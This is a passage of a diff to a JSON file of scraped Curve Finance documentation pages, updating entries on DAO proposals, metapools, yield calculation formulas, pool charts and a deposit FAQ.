factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Creating a DAO proposal Creating your vote Creating your proposal Home Governance Proposals Creating a DAO proposal Creating a DAO proposal Official DAO proposals are the only way to create enforceable change on the Curve protocol. There are currently two type of votes: parameter and text. Parameter votes are automatically committed to the DAO three days after they are enacted at the end of the vote. Text proposals are different as they will often necessitate development. For those, it is recommended to discuss with the Curve team to understand feasibility and create a signalling proposal. To create a new DAO proposal, you need at least 2,500 veCRV (2,500 CRV locked for four years or 10,000 CRV locked for one year). Creating your vote Visit the Curve DAO: https://dao.curve.fi/dao , select your type of vote and submit it. Creating your proposal Every DAO proposal must be accompanied with a proposal on the Curve governance forum. Visit the proposal section: https://gov.curve.fi/c/proposals/8 and click \"New Topic\" . You will then be presented with a template to help you present your proposed choices to the community. After that's done, be sure to engage with members of the community who have questions about your proposal. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Base and metapools", + "title": "Base- and Metapools", "html_url": "https://resources.curve.fi/lp/base-and-metapools/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Base and metapools Table of contents Base & MetaPools Plain v1 Pools Lending Pools MetaPools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Base & MetaPools Plain v1 Pools Lending Pools MetaPools Base and metapools Base & MetaPools Plain v1 Pools A plain pool is the simplest and earliest implementation of Curve, where all assets in the pool are ordinary ERC-20 tokens pegged to the same price. One of the largest is TriPool , holding only the three biggest stable coins (USDC/USDT/DAI). It's a non-lending gas optimised pool similar to the sUSD one. Depositing into the Tri-Pool In plain pools, your risks are as follow: Smart contract issues with Curve Systemic issues with the stable coins in those pools Systemic issues with Synthetix (for sUSD) As you can see, risks are different which might make this pool a better choice for you depending on what your concerns in the cryptosphere are. Lending Pools A small number of v1 pools are lending pools, which means you earn interest from lending as well as trading fees. The Compound pool is the first and oldest. The you see above stands for cTokens which are Compound native tokens. This means your stable coins in the Compound pool would only be lent on the Compound protocol. Another pool is yPool which are tokens for Yearn Finance, a yield aggregator. You might think that Compound doesnt always have the best lending rates and you would be right and thus the yToken balances automatically rebalance your stable coin to the protocol(s) with the better rates (Compound, Aave and dYdX). Its free and non-custodial (as is Curve) but it is also why the yPools are considered more risky as you use a series of protocols that could themselves have critical vulnerabilities. Pools like AAVE and sAAVE also lend on AAVE v2. Lending pools are generally more expensive to interact with. In those pools, your risks are as follow: Smart contract issues with lending protocols Smart contract issues with Curve Smart contract issues with iEarn Systemic issues with the stable coins in those pools Whilst its important to not underplay risks associated with providing liquidity on Curve or DeFi in general, its worth noting that all the protocols mentioned above have existed for several months (or more for Compound or iEarn) meaning they have been extensively time tested and exploit attempts have been numerous. MetaPools Metapools allow for one token to seemingly trade with another underlying base pool. This means we could create, for example, the Gemini USD metapool : [GUSD, [3Pool]]. In this example users could seamlessly trade GUSD between the three coins in the 3Pool (DAI/USDC/USDT). This is helpful in multiple ways: Prevents diluting existing pools Allows Curve to list less liquid assets More volume and more trading fees for the DAO The Metapool in question would take GUSD and 3Pool LP tokens. This means that liquidity providers of the 3Pool who do not provide liquidity in the GUSD Metapool are shielded from systemic risks from the Metapool. Metapools in the UI will have a deposit wrapped option to deposit the 3pool token. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Base- and Metapools Table of contents Plain v1 Pools Lending Pools MetaPools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Plain v1 Pools Lending Pools MetaPools Home Liquidity Providers Base- and Metapools Plain v1 Pools A plain pool is the simplest and earliest implementation of Curve, where all assets in the pool are ordinary ERC-20 tokens pegged to the same price. One of the largest is TriPool , holding only the three biggest stable coins (USDC/USDT/DAI). It's a non-lending gas optimised pool similar to the sUSD one. Depositing into the Tri-Pool In plain pools, your risks are as follow: Smart contract issues with Curve Systemic issues with the stable coins in those pools Systemic issues with Synthetix (for sUSD) As you can see, risks are different which might make this pool a better choice for you depending on what your concerns in the cryptosphere are. Lending Pools A small number of v1 pools are lending pools, which means you earn interest from lending as well as trading fees. The Compound pool is the first and oldest. The you see above stands for cTokens which are Compound native tokens. This means your stable coins in the Compound pool would only be lent on the Compound protocol. Another pool is yPool which are tokens for Yearn Finance, a yield aggregator. You might think that Compound doesnt always have the best lending rates and you would be right and thus the yToken balances automatically rebalance your stable coin to the protocol(s) with the better rates (Compound, Aave and dYdX). Its free and non-custodial (as is Curve) but it is also why the yPools are considered more risky as you use a series of protocols that could themselves have critical vulnerabilities. Pools like AAVE and sAAVE also lend on AAVE v2. Lending pools are generally more expensive to interact with. In those pools, your risks are as follow: Smart contract issues with lending protocols Smart contract issues with Curve Smart contract issues with iEarn Systemic issues with the stable coins in those pools Whilst its important to not underplay risks associated with providing liquidity on Curve or DeFi in general, its worth noting that all the protocols mentioned above have existed for several months (or more for Compound or iEarn) meaning they have been extensively time tested and exploit attempts have been numerous. MetaPools Metapools allow for one token to seemingly trade with another underlying base pool. This means we could create, for example, the Gemini USD metapool : [GUSD, [3Pool]]. In this example users could seamlessly trade GUSD between the three coins in the 3Pool (DAI/USDC/USDT). This is helpful in multiple ways: Prevents diluting existing pools Allows Curve to list less liquid assets More volume and more trading fees for the DAO The Metapool in question would take GUSD and 3Pool LP tokens. This means that liquidity providers of the 3Pool who do not provide liquidity in the GUSD Metapool are shielded from systemic risks from the Metapool. Metapools in the UI will have a deposit wrapped option to deposit the 3pool token. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2042,23 +2050,31 @@ { "title": "Calculating yield", "html_url": "https://resources.curve.fi/lp/calculating-yield/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Calculating yield Table of contents Calculating Yield Types of Yield Base vAPY Incentives tAPR Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Calculating Yield Types of Yield Base vAPY Incentives tAPR Calculating yield Calculating Yield Explanation of how the Curve UI displays yield calculations Like all documentation within this guide, this article is intended to be detailed but non-technical, outside of a few light mathematical formulas. While we highlight specific smart contract function names that the Curve UI may reference for convenience, no knowledge of coding is otherwise necessary to understand this article. Developers seeking a more in-depth explanation of these concepts should consult the technical documentation at https://curve.readthedocs.io/ Types of Yield Curve UI displaying different types of displayed Curve yield (tAPY and tAPR). In the above screenshot you can see a Curve pool has the potential to offer many different types of yield. The documentation provides an overview of the different types of yield here: Understanding $CRV Its important to remember that these numbers are a projections of historical pool performance. The user would get this rate if the pool performance stays exactly the same for one year. These yield types are: Base vAPY: Shown on the first line, this number represents the fees that accrue to holders of the LP token based on trading volume. More Info $CRV Rewards tAPR: Shown on the second line, the rewards tAPR represents the rate of $CRV token emissions one would have earned if the pool has a rewards gauge and the user stakes into this rewards gauge. The number is listed as a range of possible rewards, based on the users locked veCRV the size of this boost can vary. More Info Incentives Rewards tAPR: Some pools also choose to stream rewards in the form of a different token this is represented on the third line if applicable. vAPY stands for variable annual percentage yield , this value calculates an annualized estimate of the trading fee yield based on the past days trading activity, inclusive of any effect of compounding. The rewards tAPR stands for token annual percentage rate token rewards must be claimed manually and therefore do not automatically compound, so rate is the more proper term. Base vAPY When Curve pools are launched, they receive a value for both the fee (the overall fee applied to trades) and the admin_fee (the percentage of this fee that goes to the Curve DAO as opposed to pool LPs). These parameters are directly viewable on the smart contract through the corresponding function names. These fees are displayed on the Curve UI pool page: These parameters may also be updated in the future by the Curve DAO by calling the commit_new_fee method. If the fees are in the process of being changed, these are readable in the smart contract via the future_fee and future_admin_fee methods. The fees are specifically earned or charged every time a user interacts with a pool contract through a transaction which may affect the pool balances. For example, directly calling the exchange function would rebalance the pool, so a fee clearly applies. If you add or remove liquidity in an imbalanced fashion, this would also adjust the ratios of tokens within the pool and thus be subject to fees. No fees are charged if a user adds coin in a balanced proportion or on removal. When you call methods to preview how many tokens you might receive for interacting with a pool (ie get_dy or calc_token_amount ) the values they return are usually but not always inclusive of any fees the UI calculations are intended to make any corrections where appropriate, but be sure to ask the support team if you have questions. Theoretically, one could calculate the base vAPY for any period by calculating the fees for every transaction and summing over the entire range. However, the Curve UI utilizes a simpler methodology to calculate the base vAPY, where t is the time in days: $$ \\left[ \\frac{virtual\\_price({t=0})}{virtual\\_price({t=-1})} \\right] ^{365} - 1 $$ In other words, the vAPY measures the change in the pools \"virtual price\" between today and yesterday, then annualizes this rate. The \"virtual price\" is a measure of the pool growth over time, and is viewable directly on the UI. The UI receives this value directly by calling the get_virtual_price method on the pool contract. Every time a transaction occurs that charges a fee, the virtual price is incremented accordingly. Thus, when a pool launches with a virtual price of exactly 1, if the pools virtual price is 1.01 at some future time, an LP holding a token has seen the tokens value increase by 1%. $$ \\frac{1.01}{1.00} - 1 = 0.01 = 1\\% $$ A virtual price of 1.01 means an LP will get 1% more value back on removing liquidity. Similarly, new users adding liquidity will receive 1% fewer LP tokens on deposit. For pegged stablecoin pools, virtual price can easily be utilized to calculate vAPY of the pool since inception with no further calculations necessary. For v2 pools, one must also consider the fluctuating prices of underlying assets. For developers, here are more details about trade fees from the technical documentation: About Trade Fees Claiming Admin Fees Fee Distribution $CRV Rewards tAPR The Curve DAO also authorizes some pools to receive bonus rewards from $CRV token emission, as described in the Understanding Gauges section of the documentation. If the pool has an eligible gauge, then the UI displays the range of possible tAPR values users are earning at present, subject to change in the future. The formula used here to calculate rewards tAPR: $$ tAPR = \\frac{(crv\\_price * inflation\\_rate * relative\\_weight * 12614400)}{working\\_supply * asset\\_price * virtual\\_price} $$ These parameters are obtained from various data sources, mostly on-chain: crv_price: The current price of the $CRV token in USD. This could be extrapolated from on-chain data, but the UI relies on the CoinGecko API to fetch this value. inflation_rate: The inflation rate of the $CRV token, accessed from the rate function of the $CRV token. relative_weight: Based on weekly voting, each Curve pool rewards gauge has a weighting relative to all other Curve gauges. This value can be calculated by calling the same function on the Curve gauge controller contract . https://dao.curve.fi/ working_supply: Accessed by calling the same function on the specific Curve gauge contract for the pool. asset_price: The price of the asset that is, if the pool contains only bitcoin, you would use the current price of $BTC. For v2 pools, this must be calculated by averaging over the specific assets within the pool. virtual_price: The measure of the pool growth over time, as described above. The magic number 12614400 is number of seconds in a year (60 * 60 * 24 * 365 = 31536000) times 0.4. In this case the 0.4 is due to the effect of boosts (minimum boost of 1 / maximum boost of 2.5 = 0.4). As shown in the UI, all tAPR values are displayed as a range, with the base rate on the left of the arrow representing the default rate one would receive if the user has no boost, and the value on the right of the arrow representing the maximum value a user could receive if the user has the maximum boost, which is 2.5 times higher than the minimum boost. Further details about calculating boosts are provided here . For developers, here are relevant links to the technical documentation: About Liquidity Gauges Gauge Controller Gauges for EVM Sidechains Gauge Proxy Incentives tAPR All pools may permissionlessly stream other token rewards without approval from the Curve DAO. The UI displays these bonus rewards only when applicable. In the example of stETH below, note how the pool is streaming $LDO tokens in addition to $CRV rewards. Pool Overview Page stETH Pool Page Further information on these extra incentives is available in the developer documentation. The Curve DAO: Liquidity Gauges and Minting CRV Curve 1.0.0 documentation Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Calculating yield Table of contents Types of Yield Base vAPY CRV Rewards tAPR Incentives tAPR Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Types of Yield Base vAPY CRV Rewards tAPR Incentives tAPR Home Liquidity Providers Calculating yield Explanation of how the Curve UI displays yield calculations Like all documentation within this guide, this article is intended to be detailed but non-technical, outside of a few light mathematical formulas. While we highlight specific smart contract function names that the Curve UI may reference for convenience, no knowledge of coding is otherwise necessary to understand this article. Developers seeking a more in-depth explanation of these concepts should consult the technical documentation at https://curve.readthedocs.io/ Types of Yield Curve UI displaying different types of displayed Curve yield (tAPY and tAPR). In the above screenshot you can see a Curve pool has the potential to offer many different types of yield. The documentation provides an overview of the different types of yield here: Understanding $CRV Its important to remember that these numbers are a projections of historical pool performance. The user would get this rate if the pool performance stays exactly the same for one year. These yield types are: Base vAPY: Shown on the first line, this number represents the fees that accrue to holders of the LP token based on trading volume. More Info $CRV Rewards tAPR: Shown on the second line, the rewards tAPR represents the rate of $CRV token emissions one would have earned if the pool has a rewards gauge and the user stakes into this rewards gauge. The number is listed as a range of possible rewards, based on the users locked veCRV the size of this boost can vary. More Info Incentives Rewards tAPR: Some pools also choose to stream rewards in the form of a different token this is represented on the third line if applicable. vAPY stands for variable annual percentage yield , this value calculates an annualized estimate of the trading fee yield based on the past days trading activity, inclusive of any effect of compounding. The rewards tAPR stands for token annual percentage rate token rewards must be claimed manually and therefore do not automatically compound, so rate is the more proper term. Base vAPY When Curve pools are launched, they receive a value for both the fee (the overall fee applied to trades) and the admin_fee (the percentage of this fee that goes to the Curve DAO as opposed to pool LPs). These parameters are directly viewable on the smart contract through the corresponding function names. These fees are displayed on the Curve UI pool page: These parameters may also be updated in the future by the Curve DAO by calling the commit_new_fee method. If the fees are in the process of being changed, these are readable in the smart contract via the future_fee and future_admin_fee methods. The fees are specifically earned or charged every time a user interacts with a pool contract through a transaction which may affect the pool balances. For example, directly calling the exchange function would rebalance the pool, so a fee clearly applies. If you add or remove liquidity in an imbalanced fashion, this would also adjust the ratios of tokens within the pool and thus be subject to fees. No fees are charged if a user adds coin in a balanced proportion or on removal. When you call methods to preview how many tokens you might receive for interacting with a pool (ie get_dy or calc_token_amount ) the values they return are usually but not always inclusive of any fees the UI calculations are intended to make any corrections where appropriate, but be sure to ask the support team if you have questions. Theoretically, one could calculate the base vAPY for any period by calculating the fees for every transaction and summing over the entire range. However, the Curve UI utilizes a simpler methodology to calculate the base vAPY, where t is the time in days: $$ \\left[ \\frac{virtual\\_price({t=0})}{virtual\\_price({t=-1})} \\right] ^{365} - 1 $$ In other words, the vAPY measures the change in the pools \"virtual price\" between today and yesterday, then annualizes this rate. The \"virtual price\" is a measure of the pool growth over time, and is viewable directly on the UI. The UI receives this value directly by calling the get_virtual_price method on the pool contract. Every time a transaction occurs that charges a fee, the virtual price is incremented accordingly. Thus, when a pool launches with a virtual price of exactly 1, if the pools virtual price is 1.01 at some future time, an LP holding a token has seen the tokens value increase by 1%. $$ \\frac{1.01}{1.00} - 1 = 0.01 = 1\\% $$ A virtual price of 1.01 means an LP will get 1% more value back on removing liquidity. Similarly, new users adding liquidity will receive 1% fewer LP tokens on deposit. For pegged stablecoin pools, virtual price can easily be utilized to calculate vAPY of the pool since inception with no further calculations necessary. For v2 pools, one must also consider the fluctuating prices of underlying assets. For developers, here are more details about trade fees from the technical documentation: About Trade Fees Claiming Admin Fees Fee Distribution CRV Rewards tAPR The Curve DAO also authorizes some pools to receive bonus rewards from $CRV token emission, as described in the Understanding Gauges section of the documentation. If the pool has an eligible gauge, then the UI displays the range of possible tAPR values users are earning at present, subject to change in the future. The formula used here to calculate rewards tAPR: $$ tAPR = \\frac{(crv\\_price * inflation\\_rate * relative\\_weight * 12614400)}{working\\_supply * asset\\_price * virtual\\_price} $$ These parameters are obtained from various data sources, mostly on-chain: crv_price: The current price of the $CRV token in USD. This could be extrapolated from on-chain data, but the UI relies on the CoinGecko API to fetch this value. inflation_rate: The inflation rate of the $CRV token, accessed from the rate function of the $CRV token. relative_weight: Based on weekly voting, each Curve pool rewards gauge has a weighting relative to all other Curve gauges. This value can be calculated by calling the same function on the Curve gauge controller contract . https://dao.curve.fi/ working_supply: Accessed by calling the same function on the specific Curve gauge contract for the pool. asset_price: The price of the asset that is, if the pool contains only bitcoin, you would use the current price of $BTC. For v2 pools, this must be calculated by averaging over the specific assets within the pool. virtual_price: The measure of the pool growth over time, as described above. The magic number 12614400 is number of seconds in a year (60 * 60 * 24 * 365 = 31536000) times 0.4. In this case the 0.4 is due to the effect of boosts (minimum boost of 1 / maximum boost of 2.5 = 0.4). As shown in the UI, all tAPR values are displayed as a range, with the base rate on the left of the arrow representing the default rate one would receive if the user has no boost, and the value on the right of the arrow representing the maximum value a user could receive if the user has the maximum boost, which is 2.5 times higher than the minimum boost. Further details about calculating boosts are provided here . For developers, here are relevant links to the technical documentation: About Liquidity Gauges Gauge Controller Gauges for EVM Sidechains Gauge Proxy Incentives tAPR All pools may permissionlessly stream other token rewards without approval from the Curve DAO. The UI displays these bonus rewards only when applicable. In the example of stETH below, note how the pool is streaming $LDO tokens in addition to $CRV rewards. Pool Overview Page stETH Pool Page Further information on these extra incentives is available in the developer documentation. The Curve DAO: Liquidity Gauges and Minting CRV Curve 1.0.0 documentation 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Deposit faqs", + "title": "Charts and Pool Activity", + "html_url": "https://resources.curve.fi/lp/charts_poolactivity/", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Charts and Pool Activity Table of contents Charts Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Charts Pool Activity Home Liquidity Providers Charts and Pool Activity The Curve UI offers a variety of charts related to token prices , as well as an overview of exchanges and liquidity activities (such as adding or removing liquidity) for each pool.\" Info Chart and Pool Activity information is currently only available for pools on ethereum mainnet. Charts LP tokens are tokens received upon depositing assets into a liquidity pool. These tokens represent the holder's share of the pool and can be redeemed for a portion of the funds, plus any fees accrued over time. Similar to other tokens, their value is contingent on the prices of the underlying assets in the liquidity pool. Navigating to the Chart tab reveals a graphical interface of the LP Token price in relation to, for example, USDT. In the top right corner, options are available to expand/minimize or refresh the chart, as well as to adjust its timeframe. Clicking on LP Token Price (USDT) reveals a drop-down menu with additional charts. Pool Activity Besides a chart for prices, the UI also provides an overview of swaps and liquidity actions for the pool under the Pool Activity tab. On the Swaps tab, the interface shows the tokens swapped and the time of each transaction, indicating how many hours or minutes ago it occurred. Clicking on a specific swap will redirect the user to the transaction on Etherscan. Navigating to the Liquidity tab to display deposits and withdrawals in the pool. 2023-10-25 Back to top", + "labels": [ + "Documentation" + ] + }, + { + "title": "Deposit FAQ", "html_url": "https://resources.curve.fi/lp/deposit-faqs/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Deposit faqs Table of contents Deposit FAQs What is the y in the y pools (also what is Yearn)? What is the deposit wrapped option? What happens when you provide liquidity on Curve? Does the coin I deposit matter? Understanding deposit bonuses But does that mean I can still withdraw in my favorite stable coin? How quickly does interest accrue/compound? What is arbitrage? What are incentivized pools? What makes the incentives APR move? Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Deposit FAQs What is the y in the y pools (also what is Yearn)? What is the deposit wrapped option? What happens when you provide liquidity on Curve? Does the coin I deposit matter? Understanding deposit bonuses But does that mean I can still withdraw in my favorite stable coin? How quickly does interest accrue/compound? What is arbitrage? What are incentivized pools? What makes the incentives APR move? Deposit faqs Deposit FAQs What is the y in the y pools (also what is Yearn)? Yearn is a yield aggregator. You might think that Compound doesnt always have the best lending rates and you would be right thus the yToken balances automatically your stablecoin to the protocol(s) with the better rates (Compound, Aave and dYdX). Its free and non-custodial (as is Curve) but it is also why the yPools are considered more risky as you use a series of protocols that could themselves have critical vulnerabilities. What is the deposit wrapped option? (This applies to metapools or pools with tokens with c tokens or y tokens). If you deposit a stablecoin to one of the pools with lending, Curve will automatically wrap your token to a cToken (for Compound) or a yToken(for yearn). The option is simply there if you have already previously wrapped your tokens on yearn or lent them on Compound. If your stablecoin is in its original form, you can ignore this option. What happens when you provide liquidity on Curve? When you go to the deposit page and deposit one stablecoin, it then gets split between each token in the pool. Thats something you have to keep in mind because if you were to deposit 1000 DAI in the yPool, a per the screenshot below, your balance would be roughly equal to 158.9 DAI, 142.4 USDC, 582.4 USDT and 121.6 TUSD. Those values change constantly as people trade and arb the price of stable coins. Does the coin I deposit matter? Besides the deposit bonus explained below, it doesnt matter. Your tokens will get split into the pool and it doesnt affect your returns so you can deposit one, some or all the coins into the pool without worrying about it affecting your returns. Understanding deposit bonuses On the screenshot above, you can see TUSD is quite low on the pool so if your plan was to join the yPool, you would ideally deposit TUSD into it. As you can see on the screenshot, you would get an instant 0.2% bonus for depositing TUSD into the pool. The main reason for this is that TUSD is currently slightly more expensive so if you went to a centralized exchange you might sell it for $1.007 instead of $1. The deposit bonus reflects that. The other reason behind this is that the pools are always trying to balance themselves and go back to equal parts (in this case 25% TUSD) so depositing the coin with the lowest share will get you a deposit bonus. But does that mean I can still withdraw in my favorite stable coin? When you withdraw, the same principle applies (but reversed). If you withdraw the stable coin with the biggest share, you would get a bonus but you still choose what stable coin you want to withdraw. How quickly does interest accrue/compound? Interests for pools using lending protocols compound every block or 15 seconds or immediately after fees are paid. Its also compounded automatically. What is arbitrage? Arbitrage is the simultaneous buying and selling of, in our case, a token to make a profit. Because cryptocurrency markets can often lack liquidity, there are often opportunities for traders to take advantage of price discrepancies to make a profit which can be helped by protocols like Curve. An example of that below: https://etherscan.io/tx/0x259b7ac1f50554fe5ddcfeea7b4fa90ad70356ddfbbd341289db0dfbf99447f9 In this transaction, someone used Curve and OasisDex and made around $200. This goes back to what was discussed earlier with liquidity pools. The idea is that is you incentivize traders to take advantage of price discrepancies which we all get rewarded for. What are incentivized pools? Liquidity pools (particularly one without an opportunity cost) are a great way to help stable coins keep their pegs. It makes easy for traders to arb (see question above) when the price slips off the peg which is very important for all the companies and foundations developing stable coins as having a $0.98 stablecoin is never a good look. As a result, some pools on Curve are incentivized. That means that on top of trading fees and lending fees, the companies will give rewards to people providing liquidity to the pools with their coins. What makes the incentives APR move? The steth pool in this screenshot earns another 2.69% of LDO per year and there are three variables that can make this change: The LDO distributed is based on the number of people staking their LP tokens, which means your share of rewards gets lower if more people start staking The price of LDO (price of LDO going up would make the yearly bonus go up) The size of weekly rewards (48,000 SNX as of today) could also be lowered as Lido reevaluates its partnership with Curve Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Deposit FAQ Table of contents What is the deposit wrapped option? What happens when you provide liquidity on Curve? Does the coin I deposit matter? Understanding deposit bonuses But does that mean I can still withdraw in my favorite stable coin? How quickly does interest accrue/compound? What is arbitrage? What are incentivized pools? What makes the incentives APR move? Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What is the deposit wrapped option? What happens when you provide liquidity on Curve? Does the coin I deposit matter? Understanding deposit bonuses But does that mean I can still withdraw in my favorite stable coin? How quickly does interest accrue/compound? What is arbitrage? What are incentivized pools? What makes the incentives APR move? Home Liquidity Providers Deposit FAQ What is the deposit wrapped option? (This applies to metapools or pools with c-tokens or a-tokens). If you deposit a stablecoin to one of the pools with lending, Curve will automatically wrap your token to a cToken (for Compound) or aToken (for AAVE). The option is simply there if you have already previously lent them on Compound or AAVE. If your stablecoin is in its original form, you can ignore this option. If you deposit into metapools and you have the corresponding basepool token (for example, 3Crv), you can also use the \"deposit wrapped\" option to deposit this token. What happens when you 